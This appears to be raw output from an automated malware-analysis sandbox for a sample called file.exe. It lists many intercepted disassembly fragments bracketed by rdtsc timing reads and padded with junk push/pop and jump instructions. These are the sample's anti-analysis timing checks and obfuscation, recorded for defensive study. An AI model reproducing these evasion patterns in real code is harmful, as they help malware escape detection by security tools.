Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC5237 second address: FC5257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB1DCC289D6h 0x0000000a jbe 00007FB1DCC289D6h 0x00000010 jc 00007FB1DCC289D6h 0x00000016 popad 0x00000017 push edx 0x00000018 jbe 00007FB1DCC289D6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC56E1 second address: FC56FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB1DD323672h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC56FB second address: FC56FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC56FF second address: FC5708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC9FAE second address: FC9FC8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FB1DCC289D6h 0x0000000e jmp 00007FB1DCC289DCh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC9FC8 second address: FC9FE5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB1DD323666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB1DD32366Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC8E75 second address: FC8E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8A785 second address: F8A78B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8A78B second address: F8A79F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1DCC289E0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8A79F second address: F8A7B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FB1DD32366Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8A86F second address: F8A874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8A874 second address: F8A87A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8AEBC second address: F8AEC6 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB1DCC289D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8AEC6 second address: F8AED1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FB1DD323666h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8AF21 second address: F8AF5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c mov dword ptr [ebp+122D1DFDh], ebx 0x00000012 adc dx, 9CD8h 0x00000017 push eax 0x00000018 pushad 0x00000019 jnl 00007FB1DCC289DCh 0x0000001f jno 00007FB1DCC289D6h 0x00000025 pushad 0x00000026 ja 00007FB1DCC289D6h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8B7DF second address: F8B7E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BA29 second address: F8BAD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or dword ptr [ebp+122D2F52h], ebx 0x00000012 lea eax, dword ptr [ebp+1247F51Fh] 0x00000018 mov dh, 83h 0x0000001a nop 0x0000001b jmp 00007FB1DCC289E8h 0x00000020 push eax 0x00000021 jbe 00007FB1DCC289E6h 0x00000027 push eax 0x00000028 jmp 00007FB1DCC289DEh 0x0000002d pop eax 0x0000002e nop 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FB1DCC289D8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Ah 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov edi, dword ptr [ebp+122D247Eh] 0x0000004f lea eax, dword ptr [ebp+1247F4DBh] 0x00000055 push 00000000h 0x00000057 push eax 0x00000058 call 00007FB1DCC289D8h 0x0000005d pop eax 0x0000005e mov dword ptr [esp+04h], eax 0x00000062 add dword ptr [esp+04h], 00000015h 0x0000006a inc eax 0x0000006b push eax 0x0000006c ret 0x0000006d pop eax 0x0000006e ret 0x0000006f mov dh, 49h 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 push edx 0x00000077 pop edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BAD9 second address: F8BADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BADD second address: F8BAE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8BAE3 second address: F75579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB1DD32366Bh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push ebx 0x00000011 mov dword ptr [ebp+122D237Eh], edi 0x00000017 pop edi 0x00000018 push ebx 0x00000019 mov dword ptr [ebp+1245197Ah], esi 0x0000001f pop ecx 0x00000020 call dword ptr [ebp+1244E6C2h] 0x00000026 jp 00007FB1DD323670h 0x0000002c push ecx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC915E second address: FC9168 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB1DCC289D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC9168 second address: FC916E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC916E second address: FC9180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB1DCC289DDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC9180 second address: FC91AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB1DD323676h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d js 00007FB1DD323672h 0x00000013 jl 00007FB1DD323666h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC91AC second address: FC91BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FB1DCC289D6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8AF1D second address: F8AF21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC9A14 second address: FC9A19 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC9B62 second address: FC9B8A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jng 00007FB1DD323666h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jl 00007FB1DD32368Ah 0x00000014 jmp 00007FB1DD323670h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC9B8A second address: FC9B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCD52B second address: FCD559 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB1DD323679h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB1DD32366Bh 0x0000000f js 00007FB1DD323666h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD1D49 second address: FD1D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD203C second address: FD2055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD2055 second address: FD206E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD21D3 second address: FD21D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD21D9 second address: FD21E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB1DCC289D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD21E3 second address: FD21E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD21E7 second address: FD2209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB1DCC289D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jg 00007FB1DCC289DAh 0x00000015 pushad 0x00000016 jnp 00007FB1DCC289D6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD2362 second address: FD236A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD236A second address: FD239F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FB1DCC289E7h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD250B second address: FD2511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD2511 second address: FD2517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD277B second address: FD27B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323673h 0x00000007 jmp 00007FB1DD32366Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FB1DD323671h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD27B3 second address: FD27B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD27B7 second address: FD27BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD28FA second address: FD2901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD2901 second address: FD2907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD2A62 second address: FD2A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD2A66 second address: FD2A6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD1772 second address: FD1776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD1776 second address: FD17BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FB1DD323666h 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FB1DD323670h 0x00000014 popad 0x00000015 pushad 0x00000016 jne 00007FB1DD323666h 0x0000001c jl 00007FB1DD323666h 0x00000022 jmp 00007FB1DD323675h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD579C second address: FD57A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB1DCC289D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDAA09 second address: FDAA0E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDAA0E second address: FDAA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F491C3 second address: F491C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F491C7 second address: F491D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007FB1DCC289D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDCDD4 second address: FDCDDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDC93C second address: FDC950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1DCC289DEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDCACB second address: FDCACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDE3F4 second address: FDE3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDE3F8 second address: FDE402 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB1DD323666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDE402 second address: FDE408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE1488 second address: FE14A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1DD323672h 0x00000009 jmp 00007FB1DD32366Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE14A9 second address: FE14B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F45D00 second address: F45D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FB1DD32366Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB1DD32366Fh 0x00000012 jmp 00007FB1DD32366Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F45D31 second address: F45D48 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB1DCC289D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jc 00007FB1DCC289D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE11AF second address: FE11BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB1DD323666h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE89F8 second address: FE8A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB1DCC289D6h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE745A second address: FE7477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD32366Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b je 00007FB1DD323666h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE7477 second address: FE747F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE747F second address: FE7494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB1DD323666h 0x0000000a popad 0x0000000b js 00007FB1DD32366Eh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE7627 second address: FE762D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE762D second address: FE763F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007FB1DD323666h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE763F second address: FE7643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE7643 second address: FE7662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FB1DD323695h 0x0000000e pushad 0x0000000f je 00007FB1DD323666h 0x00000015 push esi 0x00000016 pop esi 0x00000017 push edx 0x00000018 pop edx 0x00000019 popad 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8B44D second address: F8B458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB1DCC289D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE876C second address: FE877E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b popad 0x0000000c push esi 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEBD64 second address: FEBD6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEBD6C second address: FEBD9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1DD323679h 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FB1DD32366Eh 0x00000013 push edx 0x00000014 pop edx 0x00000015 jp 00007FB1DD323666h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEBD9B second address: FEBDA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEBDA1 second address: FEBDA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEBDA5 second address: FEBDAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEBF13 second address: FEBF17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEBF17 second address: FEBF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEC057 second address: FEC075 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB1DD323671h 0x0000000d pop edi 0x0000000e pushad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEC342 second address: FEC346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEC496 second address: FEC4C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FB1DD323666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FB1DD32366Eh 0x00000014 jmp 00007FB1DD32366Eh 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF0991 second address: FF09BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB1DCC289DAh 0x0000000c jmp 00007FB1DCC289E8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF0B0F second address: FF0B17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF0B17 second address: FF0B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF0B1D second address: FF0B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB1DD323666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF0FC1 second address: FF0FC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF0FC9 second address: FF0FCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF9E36 second address: FF9E75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289DDh 0x00000007 jmp 00007FB1DCC289E4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007FB1DCC289D6h 0x00000017 jmp 00007FB1DCC289E1h 0x0000001c rdtsc
